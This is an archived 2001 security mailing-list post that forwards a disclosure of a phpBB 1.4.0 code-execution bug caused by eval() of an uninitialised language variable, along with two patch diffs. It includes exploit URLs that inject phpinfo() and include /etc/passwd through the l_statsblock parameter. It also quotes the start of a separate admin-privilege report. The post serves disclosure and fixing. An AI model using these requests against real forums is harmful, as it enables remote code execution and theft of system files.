OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Joao Gouveia (tharbadkaotik.org)
Date: Sat Aug 04 2001 - 14:10:18 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi all,

    This is regarding a phpBB security hole found some months ago.
    Since this one came out, and the other ( beeing a lot worst ) didn't, I
    thought it might have some interest.
    This aplies only to phpBB v1.4.0.

    -----

    ----- Original Message -----
    From: "UnderSpell" <underspellaccao.net>
    To: <jamesphpbb.com>
    Sent: Thursday, May 17, 2001 12:15 PM
    Subject: Security bug in phpBB

    >
    >
    > His there!
    >
    > We've recente ( actually not so recently ) discover a way to run any code
    > using phpBB.
    >
    > The aproach was very simple :
    > At a given point you run a eval "eval($l_statsblock);" .
    > Since $l_statsblock is a language var we just have to find a way set up
    > us with a invalid lang file:
    > after login , go to user prefs and
    >
    http://hacks.phpbb.com/phpBB/prefs.php?viewemail=1&savecookie=0&sig=0&smile=
    0&dishtml=0&disbbcode=0&themes=2&lang=THIS_IS_AN_INVALID_LANG_FILE&save=1&us
    er=&submit=Gravar+Prefer%EAncias
    > By this time $l_statsblock is no longer initialized so we can do funny
    > stuff whith them , like :
    > http://hacks.phpbb.com/phpBB/prefs.php?l_statsblock=phpinfo();
    > or
    >
    http://hacks.phpbb.com/phpBB/prefs.php?teste=/etc/passwd&l_statsblock=includ
    e($teste);
    > and so on ... we only check the phpinfo against hack forum and the second
    > against my production and stagging boards.
    >
    > You have tow ways to fix this :
    >
    > 1 ) Check if lang file exists ( when tries to include )
    >
    > --- phpBB-1.4.0/auth.php Wed Apr 25 05:47:59 2001
    > +++ phpBB/auth.php Thu May 17 12:11:01 2001
    > -273,16 +273,19
    > // Include the appropriate language file.
    > if(!strstr($PHP_SELF, "admin"))
    > {
    > - include('language/lang_'.$default_lang.'.'.$phpEx);
    > + $langfile = 'language/lang_'.$default_lang.'.'.$phpEx;
    > }
    > else
    > {
    > if(strstr($PHP_SELF, "topicadmin")) {
    > - include('language/lang_'.$default_lang.'.'.$phpEx);
    > - } else {
    > - include('../language/lang_'.$default_lang.'.'.$phpEx);
    > - }
    > + $langfile ='language/lang_'.$default_lang.'.'.$phpEx;
    > + } else {
    > + $langfile = '../language/lang_'.$default_lang.'.'.$phpEx;
    > + }
    > }
    > +
    > + if ( ! file_exists($langfile) ) { die("Invalid Language");}
    > + else { include($langfile); }
    >
    > // See if translated pictures are available..
    > $header_image = get_translated_file($header_image);
    >
    >
    > // See if translated pictures are available..
    > $header_image = get_translated_file($header_image);
    >
    > 2 ) Initialize $l_statsblock before trying to include ( prefered )
    >
    > --- phpBB-1.4.0/auth.php Wed Apr 25 05:47:59 2001
    > +++ phpBB/auth.php Thu May 17 11:39:33 2001
    > -269,6 +269,7
    > // set vars for all scripts
    > $now_time = time();
    > $last_visit = $temptime;
    > +$l_statsblock = '';
    >
    > // Include the appropriate language file.
    > if(!strstr($PHP_SELF, "admin"))
    >
    >
    >
    > Credits for this should go for tharbadkaotik.org and
    UnderSpellaccao.net .
    >
    > (A)UnderSpell
    > 

    ---

    ----- Original Message -----
From: <kill-9modernhackers.com>
To: <bugtraqsecurityfocus.com>
Sent: Friday, August 03, 2001 8:51 PM
Subject: phpBB 1.4.0 bug leads to easy admin privileges

    > -New phpBB 1.4.x exploit
> phpBB, is an open source bulletin board created by
> the
> phpBB group. Version 1.4.x of phpBB has a variable
> input
> validation problem that can lead to limited arbitrary sql
> querys including gaining administrative access to the
> board.
(...)

    Best regards,

    Joao Gouveia
--------------
tharbadkaotik.org